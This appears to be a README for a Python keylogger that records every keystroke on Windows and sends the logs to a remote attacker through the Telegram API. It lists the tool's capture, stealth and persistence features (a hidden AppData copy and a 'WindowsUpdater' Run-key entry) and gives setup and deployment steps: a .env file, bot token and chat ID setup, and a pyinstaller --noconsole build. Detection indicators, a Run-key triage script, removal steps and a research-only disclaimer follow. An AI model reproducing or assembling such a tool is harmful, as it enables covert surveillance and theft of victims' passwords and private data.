This script is a malicious keylogger designed to compromise computer systems and steal sensitive information. Its use violates laws in nearly every country.
This Python script is a sophisticated keylogger with the following capabilities:
- Records every key pressed on the target system
- Captures:
  - Regular text characters
  - Special keys (Shift, Ctrl, Alt, etc.)
  - Space bar
  - Function keys (F1-F12)
  - Arrow keys and navigation keys
  - All other keyboard inputs
- Sends captured keystroke logs to a remote attacker via Telegram API
- Sends reports at configurable time intervals
- Handles connection failures gracefully (logs continue if internet is unavailable)
- Installs itself as a hidden, persistent application on Windows systems
- Copies itself to the hidden `AppData` directory
- Adds itself to Windows Registry startup programs
- Runs automatically when the victim logs in
- Hides its file using Windows system attributes
- Runs in the background with no visible interface
- No taskbar icon or window
- Conceals its presence from casual users
- Marks itself as a hidden system file
This script requires specific Python libraries and system access.

Install all dependencies using:

```bash
pip install -r requirements.txt
```

or install individually:

```bash
pip install pynput requests python-dotenv
```

- Windows operating system (tested on Windows 10/11)
- Administrator privileges (for registry modifications)
- Internet connectivity (to send logs via Telegram)
The script now uses environment variables from a .env file for configuration. Copy the env.example file and rename it to .env, then fill in your values.
Required Configuration File (.env):

```
# Telegram Bot Configuration
TELEGRAM_BOT_TOKEN=YOUR_BOT_TOKEN_HERE
TELEGRAM_CHAT_ID=YOUR_CHAT_ID_HERE
REPORT_INTERVAL=60
PERSISTENCE_FILENAME=winlog.exe
```

Script Imports: The script now includes the dotenv library for configuration:

```python
import os

import dotenv

dotenv.load_dotenv()

# Configuration from .env file
bot_token = os.getenv('TELEGRAM_BOT_TOKEN', 'YOUR_BOT_TOKEN_HERE')
chat_id = os.getenv('TELEGRAM_CHAT_ID', 'YOUR_CHAT_ID_HERE')
interval = int(os.getenv('REPORT_INTERVAL', 60))
filename = os.getenv('PERSISTENCE_FILENAME', "winlog.exe")
```

- Create a Telegram Bot:
  - Open Telegram and search for `@BotFather`
  - Send `/newbot` and follow instructions
  - Copy the generated bot token
- Get Chat ID:
  - Search for your bot username and start a conversation
  - Visit `https://api.telegram.org/bot{YOUR_BOT_TOKEN}/getUpdates`
  - Find your chat ID in the response

```bash
# 1. Install required libraries
pip install pynput requests
# 2. Modify the configuration variables in keylogger.py
# Replace TERA_CHAT_ID with your actual chat ID
# 3. Run the script (Windows only)
python keylogger.py
# 4. Compile to executable (optional)
pip install pyinstaller
pyinstaller --noconsole --onefile keylogger.py
```

- The script checks if it's already installed in the hidden location
- If not, it copies itself to `%APPDATA%/winlog.exe`
- Sets the file as hidden and system file
- Adds itself to Windows startup registry
- Launches the new hidden instance
- Starts capturing keystrokes
- Sends logs to Telegram at specified intervals

- Check for `winlog.exe` in `%APPDATA%` directory
- Look for "WindowsUpdater" entry in startup programs
- Monitor network traffic to `api.telegram.org`
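
The file and registry checks above as an added Python example (not part of this project's code): it triages HKCU Run values against the indicators this README lists and, going beyond them, flags any executable started from the root of `%APPDATA%` or marked hidden and system, because `PERSISTENCE_FILENAME` is configurable. The function names, reason labels, input shapes and sample data are this example's own assumptions.

```python
import ntpath

# Indicators from this README. The file name comes from PERSISTENCE_FILENAME,
# so the checks also match on behaviour, not only on the default name.
RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"
RUN_VALUE_NAME, DEFAULT_FILENAME = "WindowsUpdater", "winlog.exe"
HIDDEN_SYSTEM = 0x2 | 0x4  # FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM

def _norm(path):
    return ntpath.normcase(ntpath.normpath(path))

def exe_path(command):
    """Executable path from a Run command line (quoted or not, with or without args)."""
    command = command.strip().lstrip('"')
    end = command.lower().find(".exe")
    return command[: end + 4] if end != -1 else command.rstrip('"')

def triage(run_values, appdata, file_attrs):
    """Return [(value name, [reasons])] for suspicious HKCU Run values.
    run_values: {name: command line}; appdata: expanded %APPDATA%;
    file_attrs: {path: attribute bits} (input shapes are this example's own)."""
    attrs = {_norm(p): bits for p, bits in file_attrs.items()}
    findings = []
    for name, command in run_values.items():
        target, reasons = _norm(exe_path(command)), []
        if name.lower() == RUN_VALUE_NAME.lower():
            reasons.append("run-value-name")
        if ntpath.basename(target) == DEFAULT_FILENAME:
            reasons.append("default-filename")
        if ntpath.dirname(target) == _norm(appdata) and target.endswith(".exe"):
            reasons.append("exe-in-appdata-root")
        if (attrs.get(target, 0) & HIDDEN_SYSTEM) == HIDDEN_SYSTEM:
            reasons.append("hidden-system-file")
        if reasons:
            findings.append((name, reasons))
    return findings

def read_hkcu_run():
    """Live Run values on Windows, as input for triage()."""
    import winreg
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUN_KEY) as key:
        count = winreg.QueryInfoKey(key)[1]
        return {n: str(v) for n, v, _ in (winreg.EnumValue(key, i) for i in range(count))}

# Constructed sample data (not from a real host).
SAMPLE_APPDATA = r"C:\Users\alice\AppData\Roaming"
SAMPLE_RUN = {"OneDrive": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
              "WindowsUpdater": r"C:\Users\alice\AppData\Roaming/winlog.exe",
              "Sync": r'"C:\Users\alice\AppData\Roaming\helper.exe"'}
SAMPLE_ATTRS = {r"C:\Users\alice\AppData\Roaming\winlog.exe": 0x26, r"C:\Users\alice\AppData\Roaming\helper.exe": 0x06}
```

A "run-value-name" or "default-filename" hit matches this README's defaults directly; the other two reasons are behavioural and can fire on legitimate software, so treat them as leads to review.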

- Open Task Manager (Ctrl+Shift+Esc)
- Look for any suspicious processes
- Open Registry Editor (regedit)
- Navigate to: `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run`
- Delete the "WindowsUpdater" entry
- Delete `%APPDATA%/winlog.exe`
- Restart the computer

- Computer Fraud and Abuse Act (CFAA) - United States
- Cybercrime Laws - Most countries worldwide
- GDPR and Privacy Laws - European Union and many other regions

- Criminal Charges: Felony charges with potential jail time
- Fines: Up to hundreds of thousands of dollars
- Permanent Record: Criminal record that affects employment and travel
- Civil Lawsuits: Victims can sue for damages

This script is provided exclusively for security research, educational purposes, and defensive security testing. You must have written, explicit authorization from the system owner before using or testing this script on any computer system.
Unauthorized use of this script to gain access to computer systems or steal information is a serious crime with severe legal consequences.
Understanding how keyloggers work helps security professionals:
- Develop better anti-malware solutions
- Educate users about cyber threats
- Implement effective security measures
- Test and strengthen system defenses
This knowledge should only be used to protect systems, not to attack them.